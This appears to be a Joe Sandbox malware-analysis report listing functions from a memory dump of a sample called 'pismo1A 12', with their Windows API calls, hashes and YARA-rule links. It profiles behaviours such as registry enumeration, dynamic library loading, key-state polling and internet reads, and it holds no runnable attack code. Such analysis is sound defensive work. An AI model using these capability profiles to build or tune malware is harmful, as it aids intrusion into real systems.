API String ID: 3183298772-0
Opcode ID: 661f79ab8b154050fb2c5c583d31aae35944bb538812804e16fe53c9c179ea4f
Instruction ID: a02badc2cf8fd2c1a0c59073e09f059cedca489f95abe6c5498bbf2bd22d858d
Opcode Fuzzy Hash: 661f79ab8b154050fb2c5c583d31aae35944bb538812804e16fe53c9c179ea4f
Instruction Fuzzy Hash: 2B5185B24083849BC764EB90DC81DDB73DDAF85340F004D1EF585D3191EE79A688876A

Function 0072B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0072BB63
RegCloseKey.ADVAPI32(?,?), ref: 0072BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0072BBB3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: d00b231f0c55edd458b1702ea99eb5bac439d410e1950f5c01f4e122841dd9fa
Instruction ID: a66ee4c84bbcfd65b4145fc5f23d9bcefbc37a8b972fa711fd8a289637f12273
Opcode Fuzzy Hash: d00b231f0c55edd458b1702ea99eb5bac439d410e1950f5c01f4e122841dd9fa
Instruction Fuzzy Hash: 81619E71208241AFD714DF24D890E2ABBE5FF85308F14895CF49A8B2A2DB35ED45CB92

Function 00708BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00708BCD
VariantClear.OLEAUT32 ref: 00708C3E
VariantClear.OLEAUT32 ref: 00708C9D
VariantClear.OLEAUT32(?), ref: 00708D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00708D3B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 47a9677aa6cd7904e2148370d002bb540f25312e86c4c340310d7112019bb7de
Instruction ID: caa3178869c16f97606955d8415d3f7f022497c49eb6073668c2631738f30cce
Opcode Fuzzy Hash: 47a9677aa6cd7904e2148370d002bb540f25312e86c4c340310d7112019bb7de
Instruction Fuzzy Hash: 91516CB5A00219EFDB10CF68C884AAAB7F4FF8D310B158659E955DB350E734E911CF90

Function 00718AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00718BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00718BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00718C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00718C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00718C5F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 2305f954228d7f0a86164151dd985fefdc2e49c32953e57b28099bb4e74c996c
Instruction ID: 4abd7b07affbde788f5eba9970c2fd665fbc75d7bc9cd5158e9eec6b9643f4dc
Opcode Fuzzy Hash: 2305f954228d7f0a86164151dd985fefdc2e49c32953e57b28099bb4e74c996c
Instruction Fuzzy Hash: 36515135A002149FCB45EF54C8819ADBBF6FF49314F048498E8496B362CB35ED51CFA5

Function 00728EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00728F40
GetProcAddress.KERNEL32(00000000,?), ref: 00728FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00728FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00729032
FreeLibrary.KERNEL32(00000000), ref: 00729052

Part of subcall function 006BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00711043,?,7529E610), ref: 006BF6E6
Part of subcall function 006BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,006FFA64,00000000,00000000,?,?,00711043,?,7529E610,?,006FFA64), ref: 006BF70D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 2346f86c10c3820cc2f03e87fc6ac498fd7acdd09cab3c5b80caa283de83a807
Instruction ID: c9343f59b80668b93442212dfd5bd1dff79c1a99b543d0975e53b22046a69094
Opcode Fuzzy Hash: 2346f86c10c3820cc2f03e87fc6ac498fd7acdd09cab3c5b80caa283de83a807
Instruction Fuzzy Hash: AB514734A012159FCB51EF58C4948A9BBF2FF49314F088098E90AAB362DB35ED85CF91

Function 00736B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00736C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00736C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00736C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0071AB79,00000000,00000000), ref: 00736C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00736CC7

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 188b87462965ceefe9bd137a8c072ce2f7a8cfa584f1e601965b126b6759d74a
Instruction ID: 34cc02223450b15d8e96ba58afe925e9c55271e4c6824c52ade64f9afdb6c19d
Opcode Fuzzy Hash: 188b87462965ceefe9bd137a8c072ce2f7a8cfa584f1e601965b126b6759d74a
Instruction Fuzzy Hash: 14411735600104BFFB24CF28CC58FA5BBA5EB09350F159268F899A72E2C379FD41CA60

Function 006D2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 006D20C3
_free.LIBCMT ref: 006D20E3

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bbf7dbc4252066e4352bdb06c5fb097d75aaf67452323d90e70bc21151d9fb0e
Instruction ID: e30bd8d2d9a8791e6b541578e562d8e605dd4f360cdc1f57f8c2e881b592bc49
Opcode Fuzzy Hash: bbf7dbc4252066e4352bdb06c5fb097d75aaf67452323d90e70bc21151d9fb0e
Instruction Fuzzy Hash: 5B41D372E00201AFCB20DF78CC90AADB3A6EF98314B1585AAE615EB351D631AD01CB80

Function 006B912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006B9141
ScreenToClient.USER32(00000000,?), ref: 006B915E
GetAsyncKeyState.USER32(00000001), ref: 006B9183
GetAsyncKeyState.USER32(00000002), ref: 006B919D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 2b62a5e5edd4c108a4d21ad1fa875db906c2cc9377143e6e41f04b3230596dbc
Instruction ID: b37a1195e7d84454d3ee4bceadc74b538fe2e3f37035ce4173bc498ddc494d83
Opcode Fuzzy Hash: 2b62a5e5edd4c108a4d21ad1fa875db906c2cc9377143e6e41f04b3230596dbc
Instruction Fuzzy Hash: 6541707190850AFBDF05DF68C848BFEB776FF05320F248229E525A7290C7345995DB61

Function 00713874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 007138CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00713922
TranslateMessage.USER32(?), ref: 0071394B
DispatchMessageW.USER32(?), ref: 00713955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00713966

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: d373a80a83920c3a0d01f0d71a5fe43b84db7de3e2ef9ebf28ca1f7acdc852c6
Instruction ID: 3f0c63d8bdf46a541fe139efdb548559e1183dbeeb5ec88f21b4ae164416eacf
Opcode Fuzzy Hash: d373a80a83920c3a0d01f0d71a5fe43b84db7de3e2ef9ebf28ca1f7acdc852c6
Instruction Fuzzy Hash: 3331C6705043419EEB35CB3C9849FF63BA8AB05348F544569E46A920E0E3BCB6C5CB25

Function 0071CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0071CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0071CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFF2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: edb29e426879b58482e3b45c0d24ef42b4797e38d4608acaa6f29191528a1337
Instruction ID: e2a6ae22a1033bbaf3ac96322c0cb8abe4e407ca97c35a7e2f24e0acc46e39cb
Opcode Fuzzy Hash: edb29e426879b58482e3b45c0d24ef42b4797e38d4608acaa6f29191528a1337
Instruction Fuzzy Hash: E8314F72540205AFDB21DFE9C8849EBBBFDEB14351B10842EF516E2190D738EE829B64

Function 00701901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00701915
PostMessageW.USER32(00000001,00000201,00000001), ref: 007019C1
Sleep.KERNEL32(00000000,?,?,?), ref: 007019C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 007019DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 007019E2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 07dd149b171eab3e3dd14a7fe93011be3be12e3f1e505a52bf6d433887a1979e
Instruction ID: 1dae97ac1a76f1816144f6cc83905d18d39eb55001df4f037ad1b871b861868d
Opcode Fuzzy Hash: 07dd149b171eab3e3dd14a7fe93011be3be12e3f1e505a52bf6d433887a1979e
Instruction Fuzzy Hash: 2F31D171A10259EFDB00CFA8CD99ADE3BB5EB05315F508329F921A72D1C774AD44DB90

Function 00735706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00735745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0073579D
_wcslen.LIBCMT ref: 007357AF
_wcslen.LIBCMT ref: 007357BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00735816

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 6b02974a2139a1f69b9a3f06057975b03bf83dfa57d8dd226698498037ca96d4
Instruction ID: 2569d568b952c656dd8ea0e9876d3f60de138acd24f3418fa41da0762a08166d
Opcode Fuzzy Hash: 6b02974a2139a1f69b9a3f06057975b03bf83dfa57d8dd226698498037ca96d4
Instruction Fuzzy Hash: 45219671904618DAEB20DF64CC85EED77B8FF04724F108256F919EB181D7789985CF50

Function 00720930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00720951
GetForegroundWindow.USER32 ref: 00720968
GetDC.USER32(00000000), ref: 007209A4
GetPixel.GDI32(00000000,?,00000003), ref: 007209B0
ReleaseDC.USER32(00000000,00000003), ref: 007209E8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 2f3acf62926c5dc75a484f25e2c268c6e775e616ca5db68dc9db2e2dcbe1595a
Instruction ID: 1832741f6c6e4817c8238058e0b53ad19e6434e4a86a8d43056e9797b618d9c5
Opcode Fuzzy Hash: 2f3acf62926c5dc75a484f25e2c268c6e775e616ca5db68dc9db2e2dcbe1595a
Instruction Fuzzy Hash: 54216275600214EFD704EF69D849A9EB7E5EF45701F04806CE846A7762DB34AD44CB94

Function 006DCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006DCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DCDE9

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006DCE0F
_free.LIBCMT ref: 006DCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DCE31

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ce353acf0768861f0230db6d7a3c0665d1f846854fc223a6b223364437af78bb
Instruction ID: 5a65930ac331323c202c53e62deb77828f8671dd5b592b31bb769b961bb21018
Opcode Fuzzy Hash: ce353acf0768861f0230db6d7a3c0665d1f846854fc223a6b223364437af78bb
Instruction Fuzzy Hash: D401B5B2E0121B7F772116BA6C58DBBBA6EDEC6BB1315412AF905D7300DA648D01D2B4

Function 006B9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
SelectObject.GDI32(?,00000000), ref: 006B96A2
BeginPath.GDI32(?), ref: 006B96B9
SelectObject.GDI32(?,00000000), ref: 006B96E2

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2de4d58a562d0284fb22415752fa900933b68e6ed0d7e38de1e3af426652b721
Instruction ID: 4382bcf5fc9e39fd00f339c7a417fbcc0c3eb0be21e7b36761f2b7859ce9df13
Opcode Fuzzy Hash: 2de4d58a562d0284fb22415752fa900933b68e6ed0d7e38de1e3af426652b721
Instruction Fuzzy Hash: BF21C5B1801349EFEB118F28DC047E97BB6BB10395F508216F614A61B0E37868C2CFA8

Function 00705711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00705726
_memcmp.LIBVCRUNTIME ref: 00705744
_memcmp.LIBVCRUNTIME ref: 00705757
_memcmp.LIBVCRUNTIME ref: 0070576F
_memcmp.LIBVCRUNTIME ref: 00705787

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: d46096b21e72e0aa00e33ada5c53fcf3725ea46040bbe89096dd9e2bda915681
Instruction ID: 44e7fc5ee0da425991544ec15317b7f9886ddad094edd1cb3fa21356033eacb1
Opcode Fuzzy Hash: d46096b21e72e0aa00e33ada5c53fcf3725ea46040bbe89096dd9e2bda915681
Instruction Fuzzy Hash: 1001B9E1681605FBE71855209E52FBB739DDF22398F005128FD089E2C2FB68ED1096B5

Function 006D2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,006CF2DE,006D3863,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6), ref: 006D2DFD
_free.LIBCMT ref: 006D2E32
_free.LIBCMT ref: 006D2E59
SetLastError.KERNEL32(00000000,006A1129), ref: 006D2E66
SetLastError.KERNEL32(00000000,006A1129), ref: 006D2E6F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 5290329de28652b131c03e77922a8ea6a5c9ba31588558a4cccb25aedc8c38db
Instruction ID: 909f4e634583a9a8e0918f9cebbca9f3dbbb8fa0c3984a0a95ee0996063b78d9
Opcode Fuzzy Hash: 5290329de28652b131c03e77922a8ea6a5c9ba31588558a4cccb25aedc8c38db
Instruction Fuzzy Hash: 3F014932E046026BC61323356CA6D6B275BABF23B2720842FF421A3392EE78CC010165

Function 0070000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?,?,0070035E), ref: 0070002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?), ref: 00700064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700070

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
